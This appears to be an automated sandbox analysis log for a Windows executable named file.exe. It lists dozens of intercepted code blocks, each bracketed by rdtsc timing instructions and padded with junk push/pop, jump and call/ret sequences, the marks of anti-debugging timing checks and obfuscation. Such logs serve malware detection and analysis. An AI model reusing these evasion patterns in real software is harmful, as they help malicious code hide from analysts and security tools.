Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA123A second address: CA1257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 add dword ptr [esp], 31C44F94h 0x0000000d cld 0x0000000e push 9A0DB28Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F2EE8DE76F8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1257 second address: CA1261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2EE8E96BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1D88 second address: CA1D92 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2EE8DE76F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1D92 second address: CA1E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2EE8E96BD9h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F2EE8E96BC8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a jmp 00007F2EE8E96BD2h 0x0000002f call 00007F2EE8E96BD7h 0x00000034 mov ecx, 448EF8F3h 0x00000039 pop edx 0x0000003a lea eax, dword ptr [ebp+12482994h] 0x00000040 jnp 00007F2EE8E96BCCh 0x00000046 nop 0x00000047 push edx 0x00000048 push esi 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1E1C second address: CA1E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 jnl 00007F2EE8DE76FEh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F2EE8DE76F8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dword ptr [ebp+1246C342h], ecx 0x0000002e mov dx, si 0x00000031 lea eax, dword ptr [ebp+12482950h] 0x00000037 mov dword ptr [ebp+122D2EC7h], eax 0x0000003d nop 0x0000003e push ebx 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCE21 second address: CDCE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCF8B second address: CDCF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCF90 second address: CDCFC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007F2EE8E96BD8h 0x00000010 pushad 0x00000011 jmp 00007F2EE8E96BCCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCFC8 second address: CDCFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCFCE second address: CDCFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD248 second address: CDD24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD24C second address: CDD252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD252 second address: CDD258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD58A second address: CDD590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD590 second address: CDD5B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE7702h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2EE8DE76FDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD5B5 second address: CDD5E8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2EE8E96BEEh 0x00000008 jmp 00007F2EE8E96BD1h 0x0000000d jmp 00007F2EE8E96BD7h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD75E second address: CDD763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD763 second address: CDD769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDD769 second address: CDD79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2EE8DE7702h 0x0000000e jmp 00007F2EE8DE7706h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFDEF second address: CDFDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFDF5 second address: CDFE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F2EE8DE7701h 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2EE8DE76FCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2ED0 second address: CE2ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAA3B second address: CEAA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1802 second address: CA1875 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2EE8E96BCCh 0x00000008 jbe 00007F2EE8E96BC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 sub dh, FFFFFFDBh 0x00000016 mov ebx, dword ptr [ebp+1248298Fh] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F2EE8E96BC8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov dword ptr [ebp+122D1ECEh], edx 0x0000003c add eax, ebx 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F2EE8E96BC8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1875 second address: CA187C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA187C second address: CA1893 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2EE8E96BC8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jng 00007F2EE8E96BC6h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAFD1 second address: CEAFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAFD5 second address: CEB024 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jmp 00007F2EE8E96BCBh 0x00000010 jmp 00007F2EE8E96BD5h 0x00000015 pop edx 0x00000016 push edx 0x00000017 jnl 00007F2EE8E96BC6h 0x0000001d jmp 00007F2EE8E96BD1h 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEB024 second address: CEB02E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2EE8DE76F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBA95 second address: CEBA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBA99 second address: CEBA9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF08C second address: CEF0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BD0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF0A0 second address: CEF0AA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2EE8DE76F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF0AA second address: CEF0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF1FE second address: CEF204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF204 second address: CEF20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF20A second address: CEF20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF20F second address: CEF21D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2EE8E96BC8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF21D second address: CEF221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF361 second address: CEF386 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2EE8E96BD7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F2EE8E96BE4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF386 second address: CEF38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF508 second address: CEF52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jl 00007F2EE8E96BD8h 0x0000000d jmp 00007F2EE8E96BD2h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF52D second address: CEF55A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2EE8DE76F6h 0x00000008 jng 00007F2EE8DE76F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F2EE8DE76F8h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c jmp 00007F2EE8DE76FFh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF55A second address: CEF561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF561 second address: CEF572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE8DE76FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF884 second address: CEF888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF264A second address: CF267F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2EE8DE76F6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F2EE8DE76FCh 0x00000016 popad 0x00000017 jmp 00007F2EE8DE7707h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF267F second address: CF2689 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2EE8E96BCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF2689 second address: CF2694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF2C5C second address: CF2C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFB0C4 second address: CFB0CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFB0CB second address: CFB0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF923D second address: CF9261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE7706h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF9261 second address: CF926B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2EE8E96BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF926B second address: CF926F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF926F second address: CF928B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F2EE8E96BD2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF928B second address: CF928F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF93EF second address: CF93F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF93F3 second address: CF93F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF93F9 second address: CF9403 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2EE8E96BCEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF96C8 second address: CF96E7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2EE8DE770Ah 0x00000008 jmp 00007F2EE8DE7704h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF99D8 second address: CF99DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFA2B9 second address: CFA2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFAB21 second address: CFAB3D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2EE8E96BCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c ja 00007F2EE8E96BC6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFADDC second address: CFADE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE6E9 second address: CFE6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE995 second address: CFE99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEC92 second address: CFEC98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEC98 second address: CFEC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEC9E second address: CFECA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEDCC second address: CFEDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jno 00007F2EE8DE76F6h 0x0000000e popad 0x0000000f jmp 00007F2EE8DE7707h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEDF2 second address: CFEDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEDF8 second address: CFEDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFEDFE second address: CFEE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B5B0 second address: D0B5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007F2EE8DE76F6h 0x0000000c je 00007F2EE8DE76F6h 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B5C6 second address: D0B5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BD6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B5E5 second address: D0B5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B5EB second address: D0B5F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B5F1 second address: D0B608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2EE8DE76FEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09822 second address: D09833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2EE8E96BC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09833 second address: D09839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09839 second address: D0985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2EE8E96BD7h 0x0000000b jp 00007F2EE8E96BCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0985E second address: D09867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09E4C second address: D09E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09E56 second address: D09E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F2EE8DE76F6h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push esi 0x00000010 jnp 00007F2EE8DE76F6h 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 jmp 00007F2EE8DE7702h 0x0000001e pushad 0x0000001f jmp 00007F2EE8DE76FDh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09E91 second address: D09EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BCFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A14D second address: D0A153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A153 second address: D0A166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2EE8E96BC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F2EE8E96BC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A166 second address: D0A16A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A5DA second address: D0A5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A5E0 second address: D0A60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2EE8DE7709h 0x0000000b jmp 00007F2EE8DE76FEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A60D second address: D0A650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2EE8E96BD7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F2EE8E96BE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A650 second address: D0A654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
